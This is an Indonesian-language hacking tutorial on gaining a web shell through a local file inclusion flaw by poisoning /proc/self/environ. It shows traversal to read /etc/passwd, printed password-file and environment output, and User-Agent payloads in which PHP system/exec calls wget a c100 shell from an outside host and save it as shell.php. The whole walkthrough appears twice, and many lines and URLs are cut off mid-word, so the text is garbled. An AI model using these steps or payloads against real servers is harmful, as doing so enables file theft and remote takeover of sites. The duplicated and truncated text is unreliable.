Dalam tutorial hacking kali ini saya akan coba 
mengimplementasikan bagaimana membuat shell pada target server lewat LFI
 dengan metode proc/self/environ, hal ini telah dibahas  sebelumnya di 
website milw0rm pada paper ke 361.
Ok kita langsung... saja…
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?f
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?f
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_ht
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?f
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_ht
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?f
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin
daemon:x:1:1:daemon:/usr/s
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/
games:x:5:60:games:/usr/ga
man:x:6:12:man:/var/cache/
lp:x:7:7:lp:/var/spool/lpd
mail:x:8:8:mail:/var/mail:
news:x:9:9:news:/var/spool
uucp:x:10:10:uucp:/var/spo
proxy:x:13:13:proxy:/bin:/
www-data:x:33:33:www-data:
backup:x:34:34:backup:/var
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bi
nobody:x:65534:65534:nobod
libuuid:x:100:101::/var/li
syslog:x:101:102::/home/sy
klog:x:102:103::/home/klog
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bi
avahi-autoipd:x:104:110:Av
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/
saned:x:106:113::/home/san
pulse:x:107:114:PulseAudio
messagebus:x:108:117::/var
polkituser:x:109:118:Polic
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-d
haldaemon:x:111:120:Hardwa
gunslinger:x:1000:1000:gun
snmp:x:112:65534::/var/lib
guest:x:113:124:Guest,,,:/
sshd:x:114:65534::/var/run
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?f
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunsli
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.
HTTP_USER_AGENT=Mozilla/5.
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F
SCRIPT_FILENAME=/home/guns
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?f
lalu pada user-agent isikan dengan kode berikut :
<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
atau
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.
Ok kita langsung... saja…
1. Hal yang pertama dilakukan seperti teknik-teknik lainnya adalah kita terlebih dahulu coba temukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?f
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?f
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_ht
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?f
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_ht
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?f
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin
daemon:x:1:1:daemon:/usr/s
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/
games:x:5:60:games:/usr/ga
man:x:6:12:man:/var/cache/
lp:x:7:7:lp:/var/spool/lpd
mail:x:8:8:mail:/var/mail:
news:x:9:9:news:/var/spool
uucp:x:10:10:uucp:/var/spo
proxy:x:13:13:proxy:/bin:/
www-data:x:33:33:www-data:
backup:x:34:34:backup:/var
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bi
nobody:x:65534:65534:nobod
libuuid:x:100:101::/var/li
syslog:x:101:102::/home/sy
klog:x:102:103::/home/klog
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bi
avahi-autoipd:x:104:110:Av
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/
saned:x:106:113::/home/san
pulse:x:107:114:PulseAudio
messagebus:x:108:117::/var
polkituser:x:109:118:Polic
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-d
haldaemon:x:111:120:Hardwa
gunslinger:x:1000:1000:gun
snmp:x:112:65534::/var/lib
guest:x:113:124:Guest,,,:/
sshd:x:114:65534::/var/run
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?f
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunsli
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t
HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.
HTTP_USER_AGENT=Mozilla/5.
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665
REQUEST_METHOD= GET REQUEST_URI = /index.php?view=..%2F..%2F
SCRIPT_FILENAME=/home/guns
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?f
lalu pada user-agent isikan dengan kode berikut :
<?system(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
atau
<?exec(‘wget http://r57.gen.tr/c100.txt -O shell.php’);?>
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://www.site.com/shell.


